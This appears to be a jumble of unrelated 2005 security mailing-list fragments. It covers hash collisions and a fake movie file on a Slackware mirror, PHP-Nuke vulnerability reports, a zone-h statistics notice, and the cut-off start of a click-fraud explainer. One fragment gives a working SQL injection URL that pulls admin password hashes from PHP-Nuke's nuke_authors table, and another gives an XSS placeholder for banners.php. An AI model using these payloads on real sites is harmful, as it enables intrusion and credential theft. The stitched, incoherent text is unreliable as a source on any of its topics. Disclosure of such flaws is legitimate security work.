Guten Tag Jason,
[1]
J It was once said that you could not realistically create two difference
J sets of data that would cause a hash collision.
Correct, note that there has been as much (if not more) research in that field
than in
the heap overflow sector.
[2]
J It was once said that you could
The point is, that they don't check the hashes.
They send once a mail concerning file spider.tgz of size around 130kb
claiming it is Spiderman 2 movie.
And the path was like
/pub/linux/Slackware/10.0/ ... you get the idea.
So it's just a fuss worth nothing.
Just my $0.02
Honza Vlach
--
On 7 Apr 2005, Janek Vind wrote:
http://localhost/nuke76/modules.php?name=Topquerylang=%20WHERE%201=2%20UNION
%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
... and as result we can see md5 hashes of all the admin passwords in place,
where normally
top 10 votes can be seen :)
Again
A cursory web search revealed...
On 4 Apr 2005, Maksymilian Arciemowicz wrote:
- --- 1.Description --- PHP-Nuke is a Web Portal System, storytelling
[SNIP]
- --- 2. XSS ---
2.0
http://[HOST]/[DIR]/banners.php?op=EmailStatsname=sexbid=[XSS]
2.1
On Fri, 8 Apr 2005, Astharot wrote:
The graphical statistics for the year 2004 are finally ready! They also
contains excerpts of the year 2002 amd 2003 when needed.
There are two files
a nice PDF document which can be downloaded here
http://www.zone-h.org/download/file=5392/
Problem
What Is Click Fraud?
Click fraud, or click spamming, occurs when a person or program
accesses a URL with no intention of browsing the site, purchasing a
product or performing any other type of conversion action. That
definition may be hard to understand so we have put together some
examples of